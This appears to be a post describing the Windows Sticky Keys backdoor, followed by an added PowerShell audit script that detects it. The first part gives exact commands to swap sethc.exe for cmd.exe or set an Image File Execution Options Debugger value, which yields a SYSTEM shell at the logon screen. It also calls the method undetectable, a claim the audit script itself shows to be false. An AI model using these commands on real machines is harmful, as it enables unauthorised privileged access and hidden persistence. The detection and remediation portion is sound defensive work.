You can get a SYSTEM shell on a machine you have administrative access to, or on one you have physical access to and can boot from a repair disk or a Linux distribution to change files.
1. Make a backup of the original sethc.exe
copy c:\windows\system32\sethc.exe c:\
2. Copy cmd.exe into sethc.exe's place
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
3. Restart and hit the Shift key 5 times; cmd.exe will pop up!
There's also another way of doing this just before you log out of the machine for the last time. Start an elevated cmd and type:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
After a reboot, hitting the Shift key 5 times should give you access :)
The exploit is currently unpatched, and seems to work on Windows 7, Windows 8 and Windows Server 2008 R2. Plus, once it is installed, it's possible to use it through Remote Desktop. The hack is undetectable when using the registry key. Essentially, the registry entry above sets the debugger for Sticky Keys to cmd.exe, the command-line interpreter, which runs at the SYSTEM level when the machine is locked!
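As an added audit example (not part of the original post), here is a PowerShell script a defender can run elevated on a Windows host to check for both forms of the backdoor described above: the sethc.exe overwritten with cmd.exe on disk, and the IFEO Debugger value. It goes beyond the post by also checking the other accessibility binaries that the logon screen can launch the same way; that list and the $findings record layout are assumptions of this example.

```powershell
# Added audit script (not from the original post). Run in an elevated PowerShell
# session on the host being checked.
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
# sethc.exe is the binary from the post; the rest are an assumption: other
# accessibility helpers reachable from the logon screen, checked for completeness.
$accessibilityBinaries = @('sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                           'magnify.exe', 'displayswitch.exe', 'atbroker.exe')

$cmdPath = Join-Path $env:SystemRoot 'System32\cmd.exe'
$cmdHash = (Get-FileHash -Path $cmdPath -Algorithm SHA256).Hash
$findings = @()

foreach ($name in $accessibilityBinaries) {
    # Form 2 from the post: a Debugger value under the IFEO key for the binary.
    # Any value here is suspicious; nothing legitimate debugs these helpers.
    $ifeoKey  = Join-Path $ifeoRoot $name
    $debugger = (Get-ItemProperty -Path $ifeoKey -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($debugger) {
        $findings += [pscustomobject]@{ Binary = $name; Check = 'IFEO Debugger'; Detail = $debugger }
    }

    # Form 1 from the post: the file in System32 has been replaced with cmd.exe.
    $path = Join-Path $env:SystemRoot "System32\$name"
    if (-not (Test-Path -Path $path)) { continue }

    # A copied cmd.exe is byte-identical to the real one, so the hashes match.
    $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    if ($hash -eq $cmdHash) {
        $findings += [pscustomobject]@{ Binary = $name; Check = 'SHA256'; Detail = 'identical to cmd.exe' }
    }

    # The copy also keeps cmd.exe's version resource, so OriginalFilename no longer
    # matches the file name. A mismatch here is a lead to investigate, not proof.
    $original = (Get-Item -Path $path).VersionInfo.OriginalFilename
    $baseName = [IO.Path]::GetFileNameWithoutExtension($name)
    if ($original -and ($original -notlike "$baseName*")) {
        $findings += [pscustomobject]@{ Binary = $name; Check = 'VersionInfo'; Detail = "OriginalFilename is '$original'" }
    }
}

if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
} else {
    'No accessibility-binary backdoor indicators found.'
}
```

Finding the Debugger value set, or a hash match with cmd.exe, is the condition to act on; restore sethc.exe from a known-good source and delete the IFEO key, then look for how it got there.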